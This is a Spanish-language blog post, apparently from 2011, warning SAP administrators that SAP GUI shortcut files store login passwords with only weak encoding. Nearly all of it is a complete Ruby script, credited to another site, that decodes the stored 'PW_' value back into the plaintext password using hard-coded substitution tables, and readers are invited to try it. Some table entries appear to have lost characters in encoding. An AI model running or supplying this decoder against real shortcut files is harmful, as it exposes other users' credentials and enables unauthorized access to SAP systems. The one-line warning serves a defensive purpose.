Principal » Blog » blog de cyfuss

Decodificar la contraseña de acceso a SAP

Dom, 08/14/2011 - 17:07 by cyfuss   Tags:

Los usuarios pueden crear un acceso directo con los datos de la conexión a SAP mediante el GUI. Hasta aquí nada nuevo, lo preocupante empieza cuanto este acceso directo que es, básicamente, un fichero que contiene la ruta al binario, el usuario y la contraseña codificada se puede decodificar con este pequeño script para mostrar el valor de la contraseña.

Así que ya sabes Consultor Basis, nada de accesos directos.

Os dejo el código en ruby para que lo probeis y me conteis.

#!/usr/bin/env ruby
#
# SAP Easy Access Password Decoder (Kernel 640)
# Supported character set A-Z,a-z,0-9,\/|<>,.;'#~@:[]{}+=()*&^%$£"!`
#
# Author: Mylestro
# Date: 17/02/2011
#

PROG_VER = 1.0

@one, @two, @three, @four, @five, @six, @seven, @eight = Hash.new
@master = Array.new

def populate_arrays
@one = {"19" => "a", "39" => "A", "1A" => "b", "3A" => "B", "1B" => "c", "3B" => "C", "1C" => "d", "3C" => "D", "1D" => "e", "3D" => "E", "1E" => "f", "3E" => "F", "1F" => "g", "3F" => "G", "10" => "h", "30" => "H", "11" => "i", "31" => "I", "12" => "j", "32" => "J", "13" => "k", "33" => "K", "14" => "l", "34" => "L", "15" => "m", "35" => "M", "16" => "n", "36" => "N", "17" => "o", "37" => "O", "08" => "p", "28" => "P", "09" => "q", "29" => "Q", "0A" => "r", "2A" => "R", "0B" => "s", "2B" => "S", "0C" => "t", "2C" => "T", "0D" => "u", "2D" => "U", "0E" => "v", "2E" => "V", "0F" => "w", "2F" => "W", "00" => "x", "20" => "X", "01" => "y", "21" => "Y", "02" => "z", "22" => "Z", "48" => "0", "49" => "1", "4A" => "2", "4B" => "3", "4C" => "4", "4D" => "5", "4E" => "6", "4F" => "7", "40" => "8", "41" => "9", "59" => "!", "5C" => "$", "DB" => "?", "5D" => "%", "38" => "@", "26" => "^", "52" => "*", "50" => "(", "51" => ")", "53" => "+", "45" => "=", "06" => "~", "5B" => "#", "44" => "<", "46" => ">", "24" => "\\", "57" => "/", "47" => "?", "56" => ".", "54" => ",", "43" => ";", "42" => ":", "5F" => "'", "03" => "{", "05" => "}", "23" => "[", "25" => "]", "18" => "`", "04" => "|"}
@two = {"E0" => "a", "C0" => "A", "E3" => "b", "C3" => "B", "E2" => "c", "C2" => "C", "E5" => "d", "C5" => "D", "E4" => "e", "C4" => "E", "E7" => "f", "C7" => "F", "E6" => "g", "C6" => "G", "E9" => "h", "C9" => "H", "E8" => "i", "C8" => "I", "EB" => "j", "CB" => "J", "EA" => "k", "CA" => "K", "ED" => "l", "CD" => "L", "EC" => "m", "CC" => "M", "EF" => "n", "CF" => "N", "EE" => "o", "CE" => "O", "F1" => "p", "D1" => "P", "F0" => "q", "D0" => "Q", "F3" => "r", "D3" => "R", "F2" => "s", "D2" => "S", "F5" => "t", "D5" => "T", "F4" => "u", "D4" => "U", "F7" => "v", "D7" => "V", "F6" => "w", "D6" => "W", "F9" => "x", "D9" => "X", "F8" => "y", "D8" => "Y", "FB" => "z", "DB" => "Z", "B1" => "0", "B0" => "1", "B3" => "2", "B2" => "3", "B5" => "4", "B4" => "5", "B7" => "6", "B6" => "7", "B9" => "8", "B8" => "9", "A0" => "!", "A5" => "$", "22" => "?", "A4" => "%", "C1" => "@", "DF" => "^", "AB" => "*", "A9" => "(", "A8" => ")", "AA" => "+", "BC" => "=", "FF" => "~", "A2" => "#", "BD" => "<", "BF" => ">", "DD" => "\\", "AE" => "/", "BE" => "?", "AF" => ".", "AD" => ",", "BA" => ";", "BB" => ":", "A6" => "'", "FA" => "{", "FC" => "}", "DA" => "[", "DC" => "]", "E1" => "`", "FD" => "|"}
@three = {"72" => "a", "52" => "A", "71" => "b", "51" => "B", "70" => "c", "50" => "C", "77" => "d", "57" => "D", "76" => "e", "56" => "E", "75" => "f", "55" => "F", "74" => "g", "54" => "G", "7B" => "h", "5B" => "H", "7A" => "i", "5A" => "I", "79" => "j", "59" => "J", "78" => "k", "58" => "K", "7F" => "l", "5F" => "L", "7E" => "m", "5E" => "M", "7D" => "n", "5D" => "N", "7C" => "o", "5C" => "O", "63" => "p", "43" => "P", "62" => "q", "42" => "Q", "61" => "r", "41" => "R", "60" => "s", "40" => "S", "67" => "t", "47" => "T", "66" => "u", "46" => "U", "65" => "v", "45" => "V", "64" => "w", "44" => "W", "6B" => "x", "4B" => "X", "6A" => "y", "4A" => "Y", "69" => "z", "49" => "Z", "23" => "0", "22" => "1", "21" => "2", "20" => "3", "27" => "4", "26" => "5", "25" => "6", "24" => "7", "2B" => "8", "2A" => "9", "32" => "!", "37" => "$", "B0" => "?", "36" => "%", "53" => "@", "4D" => "^", "39" => "*", "3B" => "(", "3A" => ")", "38" => "+", "2E" => "=", "6D" => "~", "30" => "#", "2F" => "<", "2D" => ">", "4F" => "\\", "3C" => "/", "2C" => "?", "3D" => ".", "3F" => ",", "28" => ";", "29" => ":", "34" => "'", "68" => "{", "6E" => "}", "48" => "[", "4E" => "]", "73" => "`", "6F" => "|"}
@four = {"49" => "a", "69" => "A", "4A" => "b", "6A" => "B", "4B" => "c", "6B" => "C", "4C" => "d", "6C" => "D", "4D" => "e", "6D" => "E", "4E" => "f", "6E" => "F", "4F" => "g", "6F" => "G", "40" => "h", "60" => "H", "41" => "i", "61" => "I", "42" => "j", "62" => "J", "43" => "k", "63" => "K", "44" => "l", "64" => "L", "45" => "m", "65" => "M", "46" => "n", "66" => "N", "47" => "o", "67" => "O", "58" => "p", "78" => "P", "59" => "q", "79" => "Q", "5A" => "r", "7A" => "R", "5B" => "s", "7B" => "S", "5C" => "t", "7C" => "T", "5D" => "u", "7D" => "U", "5E" => "v", "7E" => "V", "5F" => "w", "7F" => "W", "50" => "x", "70" => "X", "51" => "y", "71" => "Y", "52" => "z", "72" => "Z", "18" => "0", "19" => "1", "1A" => "2", "1B" => "3", "1C" => "4", "1D" => "5", "1E" => "6", "1F" => "7", "10" => "8", "11" => "9", "09" => "!", "0C" => "$", "8B" => "?", "0D" => "%", "68" => "@", "76" => "^", "02" => "*", "00" => "(", "01" => ")", "03" => "+", "15" => "=", "56" => "~", "0B" => "#", "14" => "<", "16" => ">", "74" => "\\", "07" => "/", "17" => "?", "06" => ".", "04" => ",", "13" => ";", "12" => ":", "0F" => "'", "53" => "{", "55" => "}", "73" => "[", "75" => "]", "48" => "`", "54" => "|"}
@five = {"81" => "a", "A1" => "A", "82" => "b", "A2" => "B", "83" => "c", "A3" => "C", "84" => "d", "A4" => "D", "85" => "e", "A5" => "E", "86" => "f", "A6" => "F", "87" => "g", "A7" => "G", "88" => "h", "A8" => "H", "89" => "i", "A9" => "I", "8A" => "j", "AA" => "J", "8B" => "k", "AB" => "K", "8C" => "l", "AC" => "L", "8D" => "m", "AD" => "M", "8E" => "n", "AE" => "N", "8F" => "o", "AF" => "O", "90" => "p", "B0" => "P", "91" => "q", "B1" => "Q", "92" => "r", "B2" => "R", "93" => "s", "B3" => "S", "94" => "t", "B4" => "T", "95" => "u", "B5" => "U", "96" => "v", "B6" => "V", "97" => "w", "B7" => "W", "98" => "x", "B8" => "X", "99" => "y", "B9" => "Y", "9A" => "z", "BA" => "Z", "D0" => "0", "D1" => "1", "D2" => "2", "D3" => "3", "D4" => "4", "D5" => "5", "D6" => "6", "D7" => "7", "D8" => "8", "D9" => "9", "C1" => "!", "C4" => "$", "43" => "?", "C5" => "%", "A0" => "@", "BE" => "^", "CA" => "*", "C8" => "(", "C9" => ")", "CB" => "+", "DD" => "=", "9E" => "~", "C3" => "#", "DC" => "<", "DE" => ">", "BC" => "\\", "CF" => "/", "DF" => "?", "CE" => ".", "CC" => ",", "DB" => ";", "DA" => ":", "C7" => "'", "9B" => "{", "9D" => "}", "BB" => "[", "BD" => "]", "80" => "`", "9C" => "|"}
@six = {"A6" => "a", "86" => "A", "A5" => "b", "85" => "B", "A4" => "c", "84" => "C", "A3" => "d", "83" => "D", "A2" => "e", "82" => "E", "A1" => "f", "81" => "F", "A0" => "g", "80" => "G", "AF" => "h", "8F" => "H", "AE" => "i", "8E" => "I", "AD" => "j", "8D" => "J", "AC" => "k", "8C" => "K", "AB" => "l", "8B" => "L", "AA" => "m", "8A" => "M", "A9" => "n", "89" => "N", "A8" => "o", "88" => "O", "B7" => "p", "97" => "P", "B6" => "q", "96" => "Q", "B5" => "r", "95" => "R", "B4" => "s", "94" => "S", "B3" => "t", "93" => "T", "B2" => "u", "92" => "U", "B1" => "v", "91" => "V", "B0" => "w", "90" => "W", "BF" => "x", "9F" => "X", "BE" => "y", "9E" => "Y", "BD" => "z", "9D" => "Z", "F7" => "0", "F6" => "1", "F5" => "2", "F4" => "3", "F3" => "4", "F2" => "5", "F1" => "6", "F0" => "7", "FF" => "8", "FE" => "9", "E6" => "!", "E3" => "$", "64" => "?", "E2" => "%", "87" => "@", "99" => "^", "ED" => "*", "EF" => "(", "EE" => ")", "EC" => "+", "FA" => "=", "B9" => "~", "E4" => "#", "FB" => "<", "F9" => ">", "9B" => "\\", "E8" => "/", "F8" => "?", "E9" => ".", "EB" => ",", "FC" => ";", "FD" => ":", "E0" => "'", "BC" => "{", "BA" => "}", "9C" => "[", "9A" => "]", "A7" => "`", "BB" => "|"}
@seven = {"61" => "a", "41" => "A", "62" => "b", "42" => "B", "63" => "c", "43" => "C", "64" => "d", "44" => "D", "65" => "e", "45" => "E", "66" => "f", "46" => "F", "67" => "g", "47" => "G", "68" => "h", "48" => "H", "69" => "i", "49" => "I", "6A" => "j", "4A" => "J", "6B" => "k", "4B" => "K", "6C" => "l", "4C" => "L", "6D" => "m", "4D" => "M", "6E" => "n", "4E" => "N", "6F" => "o", "4F" => "O", "70" => "p", "50" => "P", "71" => "q", "51" => "Q", "72" => "r", "52" => "R", "73" => "s", "53" => "S", "74" => "t", "54" => "T", "75" => "u", "55" => "U", "76" => "v", "56" => "V", "77" => "w", "57" => "W", "78" => "x", "58" => "X", "79" => "y", "59" => "Y", "7A" => "z", "5A" => "Z", "30" => "0", "31" => "1", "32" => "2", "33" => "3", "34" => "4", "35" => "5", "36" => "6", "37" => "7", "38" => "8", "39" => "9", "21" => "!", "24" => "$", "A3" => "?", "25" => "%", "40" => "@", "5E" => "^", "2A" => "*", "28" => "(", "29" => ")", "2B" => "+", "3D" => "=", "7E" => "~", "23" => "#", "3C" => "<", "3E" => ">", "5C" => "\\", "2F" => "/", "3F" => "?", "2E" => ".", "2C" => ",", "3B" => ";", "3A" => ":", "27" => "'", "7B" => "{", "7D" => "}", "5B" => "[", "5D" => "]", "60" => "`", "7C" => "|"}
@eight = {"5F" => "a", "7F" => "A", "5C" => "b", "7C" => "B", "5D" => "c", "7D" => "C", "5A" => "d", "7A" => "D", "5B" => "e", "7B" => "E", "58" => "f", "78" => "F", "59" => "g", "79" => "G", "56" => "h", "76" => "H", "57" => "i", "77" => "I", "54" => "j", "74" => "J", "55" => "k", "75" => "K", "52" => "l", "72" => "L", "53" => "m", "73" => "M", "50" => "n", "70" => "N", "51" => "o", "71" => "O", "4E" => "p", "6E" => "P", "4F" => "q", "6F" => "Q", "4C" => "r", "6C" => "R", "4D" => "s", "6D" => "S", "4A" => "t", "6A" => "T", "4B" => "u", "6B" => "U", "48" => "v", "68" => "V", "49" => "w", "69" => "W", "46" => "x", "66" => "X", "47" => "y", "67" => "Y", "44" => "z", "64" => "Z", "0E" => "0", "0F" => "1", "0C" => "2", "0D" => "3", "0A" => "4", "0B" => "5", "08" => "6", "09" => "7", "06" => "8", "07" => "9", "1F" => "!", "1A" => "$", "9D" => "?", "1B" => "%", "7E" => "@", "60" => "^", "14" => "*", "16" => "(", "17" => ")", "15" => "+", "03" => "=", "40" => "~", "1D" => "#", "02" => "<", "00" => ">", "62" => "\\", "11" => "/", "01" => "?", "10" => ".", "12" => ",", "05" => ";", "04" => ":", "19" => "'", "45" => "{", "43" => "}", "65" => "[", "63" => "]", "5E" => "`", "42" => "|"}
@master[1] = @one
@master[2] = @two
@master[3] = @three
@master[4] = @four
@master[5] = @five
@master[6] = @six
@master[7] = @seven
@master[8] = @eight
end

def char_lookup(position,current_char)
temp = @master[position]
print temp[current_char]
end

begin
populate_arrays
if ARGV.size != 1
puts "[-] Invalid number of arguments"
exit
end
hash = ARGV[0].split("PW_")
if hash[1].length > 16
puts "[-] Password is over 8 characters, not supported"
exit
end
hash = hash[1]

if hash.length % 2 != 0
puts "[-] Invalid hash length"
exit
end

hash_size = hash.length / 2
print "[+] Decoded password: "
position = 1
value = 0
hash_size.times do
current_char = hash[value,2]
char_lookup(position,current_char)
value = value + 2
position = position.next
#sleep(1)
end
end

via: msploit

»

Comentarios

Enviar un comentario nuevo

Smileys
:);):(:D}:):P:O:?8):jawdrop::sick:
El contenido de este campo se mantiene como privado y no se muestra públicamente.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Saltos automáticos de líneas y de párrafos.
  • Textual smileys will be replaced with graphical ones.

Más información sobre opciones de formato

Captcha
Esta pregunta es para probar que el que escribe el comentario es un humano
1 + 2 =
Solve this simple math problem and enter the result. E.g. for 1+3, enter 4.

Tienda de música online